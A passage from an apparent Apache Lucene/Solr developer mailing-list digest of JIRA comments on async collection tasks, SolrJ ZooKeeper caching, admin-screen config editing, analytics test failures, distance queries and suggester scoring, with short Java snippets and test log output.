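import java.util.concurrent.Executors;

public class AsyncTaskTracker {
  private static final int MAX_COMPLETED = 100;  // the "top-X" retention

  private final Map<String, Runnable> submitted = new ConcurrentHashMap<>();
  private final Map<String, Runnable> running = new ConcurrentHashMap<>();
  private final Deque<String> completed = new ConcurrentLinkedDeque<>();
  private final ExecutorService pool = Executors.newFixedThreadPool(4);  // capped by config

  public void submit(String taskId, Runnable task) {
    submitted.put(taskId, task);
    pool.execute(() -> {
      submitted.remove(taskId);
      running.put(taskId, task);        // submitted -> running
      try {
        task.run();
      } finally {
        running.remove(taskId);         // running -> completed
        completed.addFirst(taskId);
        while (completed.size() > MAX_COMPLETED) {
          completed.pollLast();         // evict the oldest completions
        }
      }
    });
  }

  public String status(String taskId) {
    if (running.containsKey(taskId)) return "running";
    if (submitted.containsKey(taskId)) return "submitted";
    if (completed.contains(taskId)) return "completed";
    return "notfound";
  }
}
{code}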

> Async execution of OverseerCollectionProcessor tasks
> 
>
> Key: SOLR-5477
> URL: https://issues.apache.org/jira/browse/SOLR-5477
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>
> Typical collection admin commands are long running and it is very common to 
> have the requests get timed out. It is more of a problem if the cluster is 
> very large. Add an option to run these commands asynchronously:
> add an extra param async=true for all collection commands;
> the task is written to ZK and the caller is returned a task id.
> A separate collection admin command will be added to poll the status of the 
> task:
> command=status&id=7657668909
> If id is not passed, all running async tasks should be listed.
> A separate queue is created to store in-process tasks. After the tasks are 
> completed the queue entry is removed. OverseerCollectionProcessor will perform 
> these tasks in multiple threads.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5474) Have a new mode for SolrJ to not watch any ZKNode

2013-12-02 Thread Timothy Potter (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836662#comment-13836662
 ] 

Timothy Potter commented on SOLR-5474:
--

Thanks for the info about changes to ZkStateReader for SOLR-5473. I'm trying to 
think about how to differentiate between downed nodes and slow queries using 
this approach.

Let's consider the scenario where there are two nodes serving a shard (A & B) 
and LazyCloudSolrServer sends a query request to node A. Imagine that node A is 
down, but the client application doesn't know that yet because its cached state 
is stale. The request will timeout after some configurable duration. After the 
timeout, LazyCloudSolrServer refreshes the cached state and realizes node A is 
down so it sends the request to node B and the query succeeds.

However, if node A is actually healthy and the cause of the timeout is a slow 
query, then the client should have waited longer. After refreshing the state 
from ZooKeeper (in response to the timeout), the client can realize that since 
A was healthy, the cause of the timeout was likely a slow query. So does client 
re-send the slow query? That seems like it could end up in a loop of timeout / 
resends. Does LazyCloudSolrServer keep track of how many attempts it's made for 
a given query ... just brainstorming here ... I know Solr supports the 
timeAllowed parameter for a query but that's optional.

I suppose this scenario is still possible even with the current approach of 
having watcher on the state znode on the client side. Although, I have to think 
that under the current approach, the probability of sending a request to a 
downed node goes down since state is refreshed in real-time. The zk version 
doesn't help here because if node A is down, the only thing the client can do 
is wait for the request to timeout.
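
One illustrative way out of the timeout/resend loop sketched above: bound the 
attempts, and only fail over when the refreshed state says the node was 
actually down. All helpers here are hypothetical stand-ins for SolrJ 
internals, not real API:

{code:java}
import java.net.SocketTimeoutException;

public class BoundedRetry {
  static final int MAX_ATTEMPTS = 2;  // placeholder policy

  // Hypothetical stand-ins for "send the query" and "refresh state from ZK".
  static String query(String node) throws SocketTimeoutException { return "ok"; }
  static boolean nodeHealthyAfterRefresh(String collection, String node) { return true; }

  static String queryWithRetry(String collection, String nodeA, String nodeB)
      throws SocketTimeoutException {
    String node = nodeA;
    for (int attempt = 1; attempt <= MAX_ATTEMPTS; attempt++) {
      try {
        return query(node);
      } catch (SocketTimeoutException e) {
        if (nodeHealthyAfterRefresh(collection, node)) {
          throw e;  // node is up: likely a slow query, do not resend blindly
        }
        node = nodeB;  // node looked down: fail over to the other replica
      }
    }
    throw new SocketTimeoutException("out of attempts");
  }
}
{code}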

> Have a new mode for SolrJ to not watch any ZKNode
> -
>
> Key: SOLR-5474
> URL: https://issues.apache.org/jira/browse/SOLR-5474
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>
> In this mode SolrJ would not watch any ZK node.
> It fetches the state on demand and caches the most recently used n 
> collections in memory.
> SolrJ would not listen to any ZK node. When a request comes for a collection 
> ‘xcoll’,
> it would first check if such a collection exists.
> If yes, it first looks up the details in the local cache for that collection.
> If not found in the cache, it fetches the node /collections/xcoll/state.json 
> and caches the information.
> Any query/update will be sent with an extra query param specifying the 
> collection name, shard name, Role (Leader/Replica), and range (example 
> \_target_=xcoll:shard1:L:8000-b332). A node would throw an error 
> (INVALID_NODE) if it does not serve the collection/shard/Role/range combo.
> If SolrJ gets an INVALID_NODE error it would invalidate the cache and fetch 
> fresh state information for that collection (and cache it again).
> If there is a connection timeout, SolrJ assumes the node is down, re-fetches 
> the state for the collection, and tries again.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5477) Async execution of OverseerCollectionProcessor tasks

2013-12-02 Thread Anshum Gupta (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5477?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836659#comment-13836659
 ] 

Anshum Gupta commented on SOLR-5477:


+1 for [~yriveiro]

> Async execution of OverseerCollectionProcessor tasks
> 
>
> Key: SOLR-5477
> URL: https://issues.apache.org/jira/browse/SOLR-5477
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>
> Typical collection admin commands are long running and it is very common to 
> have the requests get timed out. It is more of a problem if the cluster is 
> very large. Add an option to run these commands asynchronously:
> add an extra param async=true for all collection commands;
> the task is written to ZK and the caller is returned a task id.
> A separate collection admin command will be added to poll the status of the 
> task:
> command=status&id=7657668909
> If id is not passed, all running async tasks should be listed.
> A separate queue is created to store in-process tasks. After the tasks are 
> completed the queue entry is removed. OverseerCollectionProcessor will perform 
> these tasks in multiple threads.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Yonik Seeley (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836635#comment-13836635
 ] 

Yonik Seeley commented on SOLR-5287:


It feels like multiple issues are being mixed together here.
There is the high level feature of being able to edit solrconfig/schema from 
the admin screen, which I don't see any issues with.
It's the implementation of that feature in this issue that has exploits it 
should not have?

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5500) Fix /admin/mbeans?wt=json output

2013-12-02 Thread Ramkumar Aiyengar (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5500?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836636#comment-13836636
 ] 

Ramkumar Aiyengar commented on SOLR-5500:
-

Okay cool, thought it might be worth patching at least for the trunk but will 
leave to your discretion..

> Fix /admin/mbeans?wt=json output
> 
>
> Key: SOLR-5500
> URL: https://issues.apache.org/jira/browse/SOLR-5500
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 4.3, 4.4, 4.5
>Reporter: Ramkumar Aiyengar
>Priority: Minor
> Attachments: SOLR-5500.patch
>
>
> The current {{solr-mbeans}} outputs a list of category / category values. 
> This is better represented as an object.
> {code}
>   ...
>   "solr-mbeans": [
> "CACHE",
> "queryResultCache" : {
>   "class": "org.apache.solr.search.LRUCache",
>   ...
> {code}
> Change this to:
> {code}
> ...
>   "solr-mbeans": {
> "CACHE": {
>   "queryResultCache": {
> "class": "org.apache.solr.search.LRUCache",
> ...
> {code}
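
A toy reshaping of the flat pair list into the nested form, using plain Java 
collections (the actual fix would live in the mbeans response writer, not in 
client code):

{code:java}
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

public class ReshapeMbeans {
  // Turn ["CACHE", {...}, "CORE", {...}] into {"CACHE": {...}, "CORE": {...}}.
  static Map<String, Object> toObject(List<Object> flat) {
    Map<String, Object> out = new LinkedHashMap<>();
    for (int i = 0; i + 1 < flat.size(); i += 2) {
      out.put((String) flat.get(i), flat.get(i + 1));
    }
    return out;
  }

  public static void main(String[] args) {
    List<Object> flat = new ArrayList<>();
    flat.add("CACHE");
    Map<String, Object> cache = new LinkedHashMap<>();
    cache.put("queryResultCache",
        Map.of("class", "org.apache.solr.search.LRUCache"));
    flat.add(cache);
    System.out.println(toObject(flat));
    // {CACHE={queryResultCache={class=org.apache.solr.search.LRUCache}}}
  }
}
{code}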



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Erick Erickson (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836608#comment-13836608
 ] 

Erick Erickson commented on SOLR-5488:
--

[~sbower]

Here's the most recent failure, this link still works; it's the same pattern:
http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8534/consoleFull

Here's the log output; it's not all that helpful, I don't think. It just 
shows that there are nulls in the sections returned. There's no exception being 
thrown by the analytics code; it's happily putting nulls in sometimes, e.g. .

[junit4] Suite: org.apache.solr.analytics.expression.ExpressionTest
   [junit4]   2> 133086 T539 oas.SolrTestCaseJ4.initCore initCore
   [junit4]   2> Creating dataDir: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test/J0/./solrtest-ExpressionTest-1385918695507
   [junit4]   2> 133087 T539 oasc.SolrResourceLoader. new 
SolrResourceLoader for directory: 
'/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1/'
   [junit4]   2> 133087 T539 oasc.SolrResourceLoader.replaceClassLoader Adding 
'file:/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1/lib/classes/'
 to classloader
   [junit4]   2> 133088 T539 oasc.SolrResourceLoader.replaceClassLoader Adding 
'file:/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1/lib/README'
 to classloader
   [junit4]   2> 133125 T539 oasc.SolrConfig. Using Lucene MatchVersion: 
LUCENE_50
   [junit4]   2> 133160 T539 oasc.SolrConfig. Loaded SolrConfig: 
solrconfig-basic.xml
   [junit4]   2> 133161 T539 oass.IndexSchema.readSchema Reading Solr Schema 
from schema-analytics.xml
   [junit4]   2> 133165 T539 oass.IndexSchema.readSchema [null] Schema 
name=schema-docValues
   [junit4]   2> 133201 T539 oass.IndexSchema.readSchema unique key field: id
   [junit4]   2> 133203 T539 oasc.SolrResourceLoader.locateSolrHome JNDI not 
configured for solr (NoInitialContextEx)
   [junit4]   2> 133203 T539 oasc.SolrResourceLoader.locateSolrHome using 
system property solr.solr.home: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr
   [junit4]   2> 133203 T539 oasc.SolrResourceLoader. new 
SolrResourceLoader for directory: 
'/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/'
   [junit4]   2> 133211 T539 oasc.SolrResourceLoader.locateSolrHome JNDI not 
configured for solr (NoInitialContextEx)
   [junit4]   2> 133211 T539 oasc.SolrResourceLoader.locateSolrHome using 
system property solr.solr.home: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr
   [junit4]   2> 133212 T539 oasc.SolrResourceLoader. new 
SolrResourceLoader for deduced Solr Home: 
'/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/'
   [junit4]   2> 133251 T539 oasc.CoreContainer. New CoreContainer 
1424968760
   [junit4]   2> 133251 T539 oasc.CoreContainer.load Loading cores into 
CoreContainer 
[instanceDir=/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/]
   [junit4]   2> 133252 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
socketTimeout to: 0
   [junit4]   2> 133253 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
urlScheme to: http://
   [junit4]   2> 133253 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
connTimeout to: 0
   [junit4]   2> 133253 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
maxConnectionsPerHost to: 20
   [junit4]   2> 133254 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
corePoolSize to: 0
   [junit4]   2> 133254 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
maximumPoolSize to: 2147483647
   [junit4]   2> 133254 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
maxThreadIdleTime to: 5
   [junit4]   2> 133255 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
sizeOfQueue to: -1
   [junit4]   2> 133255 T539 oashc.HttpShardHandlerFactory.getParameter Setting 
fairnessPolicy to: false
   [junit4]   2> 133260 T539 oasl.LogWatcher.createWatcher SLF4J impl is 
org.slf4j.impl.Log4jLoggerFactory
   [junit4]   2> 133260 T539 oasl.LogWatcher.newRegisteredLogWatcher 
Registering Log Listener [Log4j (org.slf4j.impl.Log4jLoggerFactory)]
   [junit4]   2> 133261 T539 oasc.CoreContainer.load Host Name: 
   [junit4]   2> 133264 T540 oasc.CoreContainer.create Creating SolrCore 
'collection1' using instanceDir: 
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1
   [junit4]   2> 133265 T540 oasc.SolrResourceLoader. new 
SolrResourceLoader for directory: 
'/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build/solr-core/test-files/solr/collection1/'
   [junit4]   2> 133265 T540 oasc.SolrResour

[jira] [Commented] (LUCENE-2395) Add a scoring DistanceQuery that does not need caches and separate filters

2013-12-02 Thread David Smiley (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-2395?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836593#comment-13836593
 ] 

David Smiley commented on LUCENE-2395:
--

These issues are unrelated.  The expressions module, I believe, provides 
convenient ways to reference numbers in DocValues/FieldCache together with 
various functions (usually mathematical) for sorting or relevancy.  But that is 
expressly excluded by the issue title: "does not need caches".  That's a 
worthwhile goal for some use-cases -- no cache means more NRT-friendly.  
Furthermore, AFAIK the Lucene expressions module is limited to single-valued 
fields, whereas an approach along the lines described in this issue, such as in 
my last comment specifically, would support multi-valued spatial fields, because 
it decodes the actual terms during its execution and can thus reference the 
same doc from multiple terms/points.
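
For readers who haven't tried it, a minimal sketch of the single-valued 
expression sort that module enables (the {{popularity}} field is illustrative):

{code:java}
import org.apache.lucene.expressions.Expression;
import org.apache.lucene.expressions.SimpleBindings;
import org.apache.lucene.expressions.js.JavascriptCompiler;
import org.apache.lucene.search.Sort;
import org.apache.lucene.search.SortField;

Sort blendedSort() throws java.text.ParseException {
  // Compile an arithmetic expression over the score and a single-valued field.
  Expression expr = JavascriptCompiler.compile("_score + ln(1 + popularity)");
  SimpleBindings bindings = new SimpleBindings();
  bindings.add(new SortField("_score", SortField.Type.SCORE));
  bindings.add(new SortField("popularity", SortField.Type.LONG));
  // true = descending; each binding yields exactly one value per doc, which is
  // why multi-valued (e.g. multi-point spatial) fields don't fit this model.
  return new Sort(expr.getSortField(bindings, true));
}
{code}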

> Add a scoring DistanceQuery that does not need caches and separate filters
> --
>
> Key: LUCENE-2395
> URL: https://issues.apache.org/jira/browse/LUCENE-2395
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/spatial
>Reporter: Uwe Schindler
> Attachments: ASF.LICENSE.NOT.GRANTED--DistanceQuery.java, 
> ASF.LICENSE.NOT.GRANTED--DistanceQuery.java
>
>
> In a chat with Chris Male, plus my own ideas from implementing for PANGAEA, I 
> thought about the broken distance query in contrib. It lacks the following 
> features:
> - It needs a query/filter for the enclosing bbox (which is constant score)
> - It needs a separate filter for filtering out hits too far away (inside bbox 
> but outside the distance limit)
> - It has no scoring, so if somebody wants to sort by distance, he needs to 
> use the custom sort. For that to work, spatial caches the distance calculation 
> (which is broken for multi-segment search)
> The idea is now to combine all three things into one query, but customizable:
> We first thought about extending CustomScoreQuery, calculating the distance 
> from FieldCache in the customScore method, and returning a score of 1 for 
> distance=0, a score of 0 at the max distance, and score<0 for farther hits that 
> are in the bounding box but not in the distance circle. To filter out such 
> negative scores, we would need to override the scorer in CustomScoreQuery, 
> which is private.
> My proposal is now to use a very stripped-down CustomScoreQuery (but not 
> extend it) that calls a method getDistance(docId) in its scorer's advance 
> and nextDoc that calculates the distance for the current doc. It stores this 
> distance also in the scorer. If the distance > maxDistance it throws away the 
> hit and calls nextDoc() again. The score() method will return per default 
> weight.value*(maxDistance - distance)/maxDistance and uses the precalculated 
> distance. So the distance is only calculated one time in nextDoc()/advance().
> To be able to plug in custom scoring, the following methods in the query can 
> be overridden:
> - float getDistanceScore(double distance) - returns per default: (maxDistance 
> - distance)/maxDistance; allows score customization
> - DocIdSet getBoundingBoxDocIdSet(Reader, LatLng sw, LatLng ne) - returns a 
> DocIdSet for the bounding box. Per default it returns e.g. the docIdSet of an 
> NRF or a cartesian tier filter. You can even plug in any other DocIdSet, e.g. 
> wrap a Query with QueryWrapperFilter
> - support a setter for the GeoDistanceCalculator that is used by the scorer 
> to get the distance.
> - a LatLng provider (similar to CustomScoreProvider/ValueSource) that returns 
> for a given doc id the lat/lng. This method is called once per IndexReader 
> at scorer creation and will retrieve the coordinates. By that we support 
> FieldCache or whatever.
> This query is almost finished in my head; it just needs coding :-)
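
Spelled out, the default falloff described above is just (a sketch of the 
proposal, not committed code):

{code:java}
// Linear falloff: 1.0 at the query point, 0.0 at maxDistance, negative beyond.
// Negative values signal the scorer to discard the hit before collection.
protected float getDistanceScore(double distance) {
  return (float) ((maxDistance - distance) / maxDistance);
}
{code}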



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Steve Rowe (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836586#comment-13836586
 ] 

Steve Rowe commented on SOLR-5287:
--

{quote}
bq. BTW, I take it this doesn't apply to the REST API for manipulating the 
schema?
It should not apply, because this does not support uploading arbitrary files or 
modifying plain XML that can get exploited with xinclude/external entities. The 
schema modification APIs hopefully only allow "semantic changes" to the schema, 
but do not allow uploading XML snippets to be included in those files without 
checks. I think Steve Rowe can comment on this, thanks for the pointer!
{quote}

At present, only JSON is supported in the Schema REST API methods that accept 
PUT or POST requests, so xinclude/external entities aren't possible.  External 
files can be pointed to, though, for classes that use them, e.g. analysis 
components.
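
For illustration, an add-field request in that JSON-only flavor might look like 
this (collection name, field name and attributes are made up; a sketch rather 
than a canonical example):

{noformat}
PUT /solr/collection1/schema/fields/my_field
Content-Type: application/json

{"type":"text_general", "stored":true}
{noformat}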

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Steven Bower (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836584#comment-13836584
 ] 

Steven Bower commented on SOLR-5488:


Per your comment on the original issue... let's just move forward with 4x... 
more people using it will lead to more issues being found.

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5488) Fix up test failures for Analytics Component

2013-12-02 Thread Steven Bower (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5488?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836583#comment-13836583
 ] 

Steven Bower commented on SOLR-5488:


I think we should try to get it fixed on trunk, then merge... I don't mind doing 
the merge. Do you have a list of the currently failing tests?

That being said, I'd love to get this in 4.x (it would make my life easier, as I 
wouldn't have to keep my copy in my local source control along with keeping 
this version up to date).

> Fix up test failures for Analytics Component
> 
>
> Key: SOLR-5488
> URL: https://issues.apache.org/jira/browse/SOLR-5488
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
> Attachments: SOLR-5488.patch, SOLR-5488.patch, SOLR-5488.patch
>
>
> The analytics component has a few test failures, perhaps 
> environment-dependent. This is just to collect the test fixes in one place 
> for convenience when we merge back into 4.x



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Resolved] (SOLR-1698) load balanced distributed search

2013-12-02 Thread Shalin Shekhar Mangar (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-1698?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Shalin Shekhar Mangar resolved SOLR-1698.
-

   Resolution: Fixed
Fix Version/s: 4.0-ALPHA

This has been incorporated in SolrCloud.

> load balanced distributed search
> 
>
> Key: SOLR-1698
> URL: https://issues.apache.org/jira/browse/SOLR-1698
> Project: Solr
>  Issue Type: Improvement
>Reporter: Yonik Seeley
> Fix For: 4.0-ALPHA
>
> Attachments: SOLR-1698.patch, SOLR-1698.patch, SOLR-1698.patch, 
> SOLR-1698.patch, SOLR-1698.patch
>
>
> Provide syntax and implementation of load-balancing across shard replicas.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Closed] (SOLR-1698) load balanced distributed search

2013-12-02 Thread Shalin Shekhar Mangar (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-1698?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Shalin Shekhar Mangar closed SOLR-1698.
---


> load balanced distributed search
> 
>
> Key: SOLR-1698
> URL: https://issues.apache.org/jira/browse/SOLR-1698
> Project: Solr
>  Issue Type: Improvement
>Reporter: Yonik Seeley
> Fix For: 4.0-ALPHA
>
> Attachments: SOLR-1698.patch, SOLR-1698.patch, SOLR-1698.patch, 
> SOLR-1698.patch, SOLR-1698.patch
>
>
> Provide syntax and implementation of load-balancing across shard replicas.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (LUCENE-5354) Blended score in AnalyzingInfixSuggester

2013-12-02 Thread Michael McCandless (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-5354?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836569#comment-13836569
 ] 

Michael McCandless commented on LUCENE-5354:


This sounds very useful!

I think a subclass could work well, if we open up the necessary methods (which 
Query to run, how to do the search / resort the results)?

We could make the index-time sorting optional as well?  This way you'd build an 
"ordinary" index, run an "ordinary" query, so you have full flexibility (but at 
more search-time cost).

> Blended score in AnalyzingInfixSuggester
> 
>
> Key: LUCENE-5354
> URL: https://issues.apache.org/jira/browse/LUCENE-5354
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/spellchecker
>Affects Versions: 4.4
>Reporter: Remi Melisson
>Priority: Minor
>  Labels: suggester
>
> I'm working on a custom suggester derived from the AnalyzingInfix. I require 
> what is called a "blended score" (//TODO ln.399 in AnalyzingInfixSuggester) 
> to transform the suggestion weights depending on the position of the searched 
> term(s) in the text.
> Right now, I'm using an easy solution:
> If I want 10 suggestions, then I search against the current ordered index for 
> the first 100 results and transform the weight:
> bq. a) by using the term position in the text (found with TermVector and 
> DocsAndPositionsEnum)
> or
> bq. b) by multiplying the weight by the score of a SpanQuery that I add when 
> searching
> and return the 10 most heavily weighted suggestions after the update.
> Since we usually don't need to suggest so many things, the bigger search + 
> rescoring overhead is not so significant, but I agree that this is not the 
> most elegant solution.
> We could include this factor (here the position of the term) directly into 
> the index.
> So, I can contribute this if you think it's worth adding.
> Do you think I should tweak AnalyzingInfixSuggester, subclass it, or create a 
> dedicated class?
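
A rough sketch of option a) above; {{positionOfFirstMatch}} stands in for the 
TermVector/DocsAndPositionsEnum lookup and is hypothetical:

{code:java}
import java.util.ArrayList;
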